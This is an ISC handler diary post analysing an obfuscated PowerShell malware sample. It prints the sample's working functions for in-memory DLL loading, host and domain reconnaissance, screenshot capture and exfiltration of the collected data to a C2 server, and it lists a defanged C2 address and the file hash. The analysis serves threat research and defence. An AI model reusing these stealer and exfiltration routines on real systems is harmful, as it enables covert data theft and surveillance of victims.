|
Attackers are always trying to bypass antivirus detection by using new techniques to obfuscate their code. I recently found a bunch of scripts that encode part of their code in Base64. The code is decoded at execution time and processed via the 'IEX' command:
iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("...Base64-data...")
Another technique used by malware developers is to inject a malicious DLL into a running process. Yes, Powershell can do awesome stuff. Yesterday, I spotted a script that hides its malicious code split in the two techniques. One part of the code is Base64 encode but some functions are directly called from a DLL loaded at run time. First, the code is uncompressed and decoded, then loaded into the Powershell process: $Z4GoLn = New-Object IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String("..."), [IO.Compression.CompressionMode]::Decompress)
$joqOfPjY = New-Object byte[](20480) $Z4GoLn.Read($joqOfPjY, 0, 20480) | Out-Null [System.Reflection.Assembly]::Load($joqOfPjY) | Out-Null Once the DLL is loaded, it's now possible to call all functions provided by the library. This is achieved by referencing the custom type and the method ("[custom.type]::method()"): [QE7K9ZJvi46.QE7K9ZJvi46]::p9Dq() You can find all the functions in the DLL using your favourite disassembler:
**************************************************************
* FUNCTION *
**************************************************************
void p9Dq-57-8272()
void <VOID> <RETURN>
p9Dq-57-8272
0040205c 28 06 SUB byte ptr [ESI],AL
0040205e 00 00 ADD byte ptr [EAX],AL
00402060 0a 6f 07 OR CH,byte ptr [EDI + 0x7]
00402063 00 00 ADD byte ptr [EAX],AL
00402065 0a 0a OR CL,byte ptr [EDX]
00402067 28 08 SUB byte ptr [EAX],CL
00402069 00 00 ADD byte ptr [EAX],AL
0040206b 0a 6f 09 OR CH,byte ptr [EDI + 0x9]
0040206e 00 00 ADD byte ptr [EAX],AL
00402070 0a 6f 0a OR CH,byte ptr [EDI + 0xa]
00402073 00 00 ADD byte ptr [EAX],AL
00402075 0a 17 OR DL,byte ptr [EDI]
00402077 8d 0e LEA ECX,[ESI]
00402079 00 00 ADD byte ptr [EAX],AL
0040207b 01 13 ADD dword ptr [EBX],EDX
0040207d 04 11 ADD AL,0x11
0040207f 04 16 ADD AL,0x16
00402081 1f POP DS
00402082 2d 9d 11 SUB EAX,0x6f04119d
04 6f
00402087 0b 00 OR EAX,dword ptr [EAX]
What does the malware do? First, it collects information about the infected host:
function kvhLZVVHv40()
{
if ((((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN))
{
$HmHCMAj1gp = "DOMAIN: NO`n`n"
} else { $HmHCMAj1gp = "DOMAIN: YES`n`n"}
$HmHCMAj1gp += "SYSTEMINFO:`n`n" + ((systeminfo) -join "`n")
$HmHCMAj1gp += "`n`nIPCONFIG:`n`n" + ((ipconfig /all) -join "`n")
$HmHCMAj1gp += "`n`nNETSTAT:`n`n" + ((netstat -f) -join "`n")
$HmHCMAj1gp += "`n`nNETVIEW:`n`n" + ((net view) -join "`n")
$HmHCMAj1gp += "`n`nTASKLIST:`n`n" + ((tasklist) -join "`n")
$HmHCMAj1gp += "`n`nWHOAMI:`n`n" + ((whoami) -join "`n")
$HmHCMAj1gp += "`n`nUSERNAME:`n`n" + ((net user $env:username /domain) -join "`n")
$HmHCMAj1gp += "`n`nDOMAIN ADMINS:`n`n" + ((net group "domain admins" /domain ) -join "`n")
$HmHCMAj1gp += "`n`nDESKTOP:`n`n" + (Get-ChildItem ([environment]::getfolderpath("desktop")) | Out-String)
$HmHCMAj1gp += "`n`nAV:`n`n" + (Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct").displayName
$V6VCS = [System.Text.Encoding]::UTF8.GetBytes($HmHCMAj1gp)
PMQty 0 $V6VCS
}
Collected data are sent to a C2:
function PMQty([int]$Wg94, [byte[]]$V6VCS)
{
$sdo7g = "https://$F36ui/" + [QE7K9ZJvi46.QE7K9ZJvi46]::EA2gkql9ya($Wg94, 0, $true)
$hwv80v = [QE7K9ZJvi46.QE7K9ZJvi46]::BPizrD($V6VCS)
(New-Object System.Net.WebClient).UploadData($sdo7g, $hwv80v)
}
The C2 is contacted via a Base64-encoded IP address and the DLL function EA2gkql9ya() generates random URI like: hxxps://23[.]227[.]193[.]48/ddqxyg/g1/cbahpbp1y/im/g/asg/3izld2/2s5kq5xexs4h5mwc/xr51fqv2p/4zm/e.jpg Using the same technique, the malware exfiltrates the content of the following registry keys (related to different versions of Outlook):
What could be also interesting? A screen capture of the desktop! Here is the function which performs the screenshot:
function cY0yMOo7U3()
{
Add-Type -Assembly System.Windows.Forms
$Ze8Fpb5KC = [Windows.Forms.SystemInformation]::VirtualScreen
$Rpmv5HB = New-Object Drawing.Bitmap $Ze8Fpb5KC.Width, $Ze8Fpb5KC.Height
$ntkkayAduow = [Drawing.Graphics]::FromImage($Rpmv5HB)
$ntkkayAduow.CopyFromScreen($Ze8Fpb5KC.Location, [Drawing.Point]::Empty, $Ze8Fpb5KC.Size)
$ntkkayAduow.Dispose()
$UkzcuaUqgj = New-Object System.IO.MemoryStream
$noFMcdA6cKj=40
$hwv80voderParams = New-Object System.Drawing.Imaging.EncoderParameters
$hwv80voderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $noFMcdA6cKj)
$OmDwFp = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq "JPEG" }
$Rpmv5HB.save($UkzcuaUqgj, $OmDwFp, $hwv80voderParams)
$Rpmv5HB.Dispose()
$V6VCS = [convert]::ToBase64String($UkzcuaUqgj.ToArray())
$V6VCS = [System.Text.Encoding]::ASCII.GetBytes($V6VCS)
PMQty 2 $V6VCS
}
Once initial data have been exfiltrated, the malware enters a loop. It queries the C2 at random interval: Start-Sleep -s (Get-Random -Input @(200..260)) Depending on the C2 answer, the malware performs the following tasks:
Unfortunately, the C2 is down at the moment, so I can't grab the DLL/PE files. The script (SHA256:9d315c1ba1d6a10c06fe0b7d12a31ec519b973403ccf01fb36584ce9750e1d6b) has a very low VT score (3/57)[1]. [1] https://www.virustotal.com/gui/file/9d315c1ba1d6a10c06fe0b7d12a31ec519b973403ccf01fb36584ce9750e1d6b/detection Xavier Mertens (@xme) |
Xme 499 Posts ISC Handler |
| Subscribe |
Sep 6th 2019 4 months ago |
Sign Up for Free or Log In to start participating in the conversation!
